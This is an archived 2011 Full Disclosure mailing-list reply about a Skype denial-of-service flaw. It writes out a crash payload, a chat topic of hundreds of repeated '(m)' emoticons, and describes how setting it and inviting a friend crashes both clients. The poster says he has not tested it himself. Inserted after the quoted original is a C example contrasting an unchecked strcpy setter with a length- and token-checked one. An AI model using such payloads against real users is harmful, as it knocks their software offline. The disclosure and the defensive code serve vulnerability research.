Full Disclosure mailing list archives

Re: Skype - local & remote Denial Of Service vulnerability - crash exploit (0day)


From: "-= Glowing Sex =-" <doomxd () gmail com>
Date: Fri, 29 Jul 2011 06:41:03 +1000

Hello noptrix,
      I did not know of this one, but if you want to know one more, which I
can credit one of the #haxnet members (dzl) for showing me, as follows:

You start a chatroom, then you set the TOPIC to some funny character; I
believe it is (m), it produces a 'muscle' symbol anyhow. Set this string, for
example set it to:

"(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m) (m)
(m) (m) (m) (m) (m) (m) (m)"

You get my drift, right.. this will show a small emoticon, which should show
an arm with a muscle.

Now, INVITE your friend to the room... it will crash BOTH clients on both
ends.
I am assuming this b0flow is similar to your one: any contact with an overly
long string and, it seems, chatting via your video, and then topic set to an
overly long emoticon string of muscly arms, they must be very much in the same
area of code. I am assuming it is some str* based thing... but I could be
wrong... someone did show me this one, and it was a while ago, so I am just
wondering if it still exists, but I have a feeling it does. I do not have a
Skype client handy, but I will ask the user, dzl, to show me the problem again
as he had shown me a screenshot, but this was a few weeks ago and I would have
to dig around, so I will assume with confidence, and welcome you to try it;
just make sure you use some emoticon, and it will b0nk it.
cheers
xd


On 29 July 2011 02:15, Levent Kayan <levonkayan () gmx net> wrote:

Hello,

http://www.youtube.com/watch?v=b9p4BZ0vsAI - vulnerability-lab.com

upcoming ~5 bugs soon.


cheers,
noptrix

--
Name: Levent 'noptrix' Kayan
E-Mail: noptrix () lamergarten net
GPG key: 0x014652c0
Key fingerprint: ABEF 4B4B 5D93 32B8 D423 A623 823D 4162 0146 52C0
Homepage: http://www.noptrix.net/
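The poster speculates that the crash comes from "some str* based thing", i.e. an unbounded string copy into a fixed-size field when a chat topic is set. The following is an added illustration of that bug class and of the input validation that closes it; it is example code written for this archive page, not Skype's code, and the `struct chatroom`, `TOPIC_MAX`, `EMOTICON_MAX` and the function names are all assumptions made for the example. The `build_flood` helper constructs a long run of "(m) " tokens like the topic string in the post so the checked setter can be exercised against it.

```c
#include <stdio.h>
#include <string.h>

/* Assumed limits for this example only (not Skype constants). */
#define TOPIC_MAX    256   /* bytes reserved for a stored topic, incl. NUL */
#define EMOTICON_MAX 64    /* maximum emoticon tokens a topic may carry   */

struct chatroom {
    char topic[TOPIC_MAX];
};

/* The pattern the post speculates about: a str* copy with no length check.
 * A topic of TOPIC_MAX bytes or more overruns the field. This function is
 * shown only for contrast and is never called with over-long input here. */
void set_topic_unchecked(struct chatroom *room, const char *topic)
{
    strcpy(room->topic, topic);
}

/* Count non-overlapping occurrences of an emoticon token such as "(m)". */
size_t count_token(const char *s, const char *token)
{
    size_t n = 0, tlen = strlen(token);
    if (tlen == 0)
        return 0;
    for (const char *p = strstr(s, token); p != NULL; p = strstr(p + tlen, token))
        n++;
    return n;
}

/* Hardened setter: refuse anything that would not fit, refuse more emoticon
 * tokens than the renderer is expected to handle, and copy with an explicit
 * bound so the field always stays NUL-terminated. On rejection the previous
 * topic is left untouched. Returns 0 on success, -1 if rejected. */
int set_topic_checked(struct chatroom *room, const char *topic)
{
    size_t len = strlen(topic);
    if (len >= TOPIC_MAX)
        return -1;                        /* would overflow the field */
    if (count_token(topic, "(m)") > EMOTICON_MAX)
        return -1;                        /* emoticon flood */
    memcpy(room->topic, topic, len + 1);  /* bounded copy including NUL */
    return 0;
}

/* Constructed input: repeat "(m) " up to `repeats` times, never writing past
 * `cap` bytes. Returns the length of the string written. */
size_t build_flood(char *buf, size_t cap, size_t repeats)
{
    const char unit[] = "(m) ";
    size_t ulen = sizeof unit - 1, n = 0;
    while (repeats-- > 0 && n + ulen < cap) {
        memcpy(buf + n, unit, ulen);
        n += ulen;
    }
    buf[n] = '\0';
    return n;
}

int main(void)
{
    struct chatroom room = {{0}};
    char flood[4096];

    printf("short topic: %s\n",
           set_topic_checked(&room, "hello (m) world") == 0 ? "accepted" : "rejected");

    size_t n = build_flood(flood, sizeof flood, 900);
    printf("flood of %zu bytes, %zu tokens: %s\n", n, count_token(flood, "(m)"),
           set_topic_checked(&room, flood) == 0 ? "accepted" : "rejected");
    printf("stored topic is still: %s\n", room.topic);
    return 0;
}
```

The length check alone would already stop the overflow the post describes; the token cap is there because a topic can be short in bytes yet still carry more emoticons than a renderer copes with, which is a separate failure mode from the buffer overrun.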

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
